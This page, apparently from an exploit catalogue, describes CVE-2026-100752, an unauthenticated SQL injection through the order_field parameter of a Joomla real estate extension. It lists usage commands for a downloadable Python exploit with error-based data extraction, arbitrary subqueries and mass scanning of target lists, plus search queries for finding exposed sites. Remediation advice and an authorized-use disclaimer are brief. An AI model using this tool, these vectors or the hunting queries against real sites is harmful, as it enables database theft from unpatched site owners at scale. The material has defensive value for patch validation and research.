CVE-2026-100752 — OrdaSoft Joomla Real Estate Manager (Free) Unauthenticated SQL Injection
September 29, 2026 · 71 views
OrdaSoft Real Estate Manager (Free) for Joomla ≤ 6.7.8: unauthenticated SQL injection (CWE-89) via order_field concatenated into ORDER BY in site/realestatemanager.php (com_realestatemanager). Public category, search, and listing views — no auth. Fixed in 6.7.9+. Python PoC: fingerprint, check, error-based exploit, mass -j; legacy order_direction POST fallback.
Description
Overview
CVE-2026-100752 affects OrdaSoft Real Estate Manager (Free) for Joomla — extension ≤ 6.7.8. Fixed in 6.7.9+.
| | |
|---|---|
| Component | com_realestatemanager |
| File | site/realestatemanager.php |
| Parameter | order_field → ORDER BY (unquoted, no allow-list) |
| Auth | None (public listing / search / category views) |
| CWE | CWE-89 SQL Injection |
| Also | Legacy order_direction POST injection (Metasploit / pre-6.7.9 audits) |
Mechanism: order_field controls the ORDER BY column/expression. Values such as error-based subqueries are injected because the value is concatenated into SQL without binding or validation.
Example route:
GET /index.php?option=com_realestatemanager&task=showCategory&catid=50&order_field=price&order_direction=asc
Affected query contexts (per CVE text):
- Category browsing (
showCategoryand related) - Search results
- Full property listing
PoC page: https://pocbit.org/pocs/cve-2026-100752
GitHub: murrez/CVE-2026-100752
Bundled tool (Python 3)
Download poc.py from this page (View exploit code).
pip install -r requirements.txt
python poc.py -u https://target.example --mode check
python poc.py -u https://target.example --mode check --aggressive
python poc.py -u https://target.example --mode exploit
python poc.py -u https://target.example --mode exploit --subquery "SELECT VERSION()"
python poc.py -u https://target.example --mode exploit --vector order_field_get
python poc.py --list targets.example.txt --mode check -j 30 --output scan.jsonl --vuln-list hits.txt
python poc.py --list hits.txt --mode exploit -j 15 --subquery "SELECT VERSION()" --exploited-list exploited.txt
| Mode | Behavior |
|------|----------|
| check | Fingerprint com_realestatemanager, scrape catid / Itemid, probe tasks; --aggressive tries SELECT VERSION() when proof is inconclusive |
| exploit | Error-based extraction via order_field GET/POST; --subquery, --vector |
| Mass | --list + -j → JSONL, hits.txt, exploited.txt |
Tasks probed include showCategory, showSearch, showSearchResult, showRent, showBuy.
Version detection
Manifest (when exposed):
/administrator/components/com_realestatemanager/realestatemanager.xml
If version ≤ 6.7.8 → likely vulnerable. If ≥ 6.7.9 → patched (exploit should fail).
Related (same release train)
| CVE | Type | Fixed |
|-----|------|-------|
| CVE-2026-100752 | Unauth SQLi (order_field) | 6.7.9 |
| CVE-2026-100753 | Reflected XSS (public property views) | 6.7.9 |
Same vendor batch (Sep 2026): Vehicle Manager and other OrdaSoft extensions received separate CVEs — patch all OrdaSoft components you run.
Hunting (examples)
body="option=com_realestatemanager"
body="com_realestatemanager" && (body="ordasoft" || header="Joomla")
title="Real Estate" && body="com_realestatemanager"
body="/components/com_realestatemanager/"
Export hostnames into targets.txt (one URL per line), then check → hits → exploit only on authorized estates.
Remediation
- Upgrade to Real Estate Manager 6.7.9+ (OrdaSoft security release).
- Inventory all OrdaSoft Joomla extensions on the same site.
- WAF / rate limits on
com_realestatemanagerparameters until patched.
Legal and ethical use
Authorized security testing and patch validation only. Do not use against systems without permission.
References
- NVD — CVE-2026-100752
- PoCbit catalog
- GitHub PoC — CVE-2026-100752
- Metasploit:
auxiliary/gather/joomla_com_realestatemanager_sqli(legacyorder_directionPOST)
Related PoCs
Same platform, vendor, or tags — explore more write-ups on Pocbit.
- JoomlaCVE-2026-101108critical
CVE-2026-101108 — OrdaSoft Joomla Vehicle Manager (Free) Unauthenticated SQL Injection
OrdaSoft Vehicle Manager (Free) for Joomla ≤ 6.5.7: unauthenticated SQL injection (CWE-89) via order_field and order_direction concatenated into unquoted ORDER BY in site/vehiclemanager.php (com_vehiclemanager). Escaping is ineffective for sort keys. Public category, search, and all-vehicles views. Fixed in 6.5.8+. CVSS 4.0 9.3 Critical. Python PoC: check, error-based exploit, mass -j.
- JoomlaCVE-2026-101110critical
CVE-2026-101110 — OrdaSoft Joomla Book Library (Free) Unauthenticated SQL Injection
OrdaSoft Book Library (Free) for Joomla ≤ 6.4.6: unauthenticated SQL injection (CWE-89) in books() via field/direction sort params — weak select substring blacklist + protectInjectionWithoutQuote, unquoted ORDER BY, session prime + `-- xselect` bypass (com_booklibrary). Fixed in 6.4.7+. CVSS 4.0 9.3 Critical. Python PoC: check, exploit, mass -j.
- JoomlaCVE-2026-88854critical
CVE-2026-88854 — OrdaSoft Joomla Gallery ≤ 6.2.6 Unauthenticated SQL Injection
Unauthenticated SQL injection in OrdaSoft **OS Gallery** (`com_osgallery` / `com_osgallery_light` ≤ 6.2.6) via the image **search** parameter (`textsearch`).
- JoomlaCVE-2026-94130critical
CVE-2026-94130 — Joomla YouTube Gallery Unauthenticated SQL Injection
Unauthenticated SQL injection (CWE-89, CVSS 4.0 9.3 Critical) in YouTube Gallery for Joomla (com_youtubegallery, joomlaboat.com) ≤ 5.7.2 — video search and sorting on the public yg_api=1 JSON API (ygsearchfields, ygsearchquery, sort params). Fixed in 5.7.3.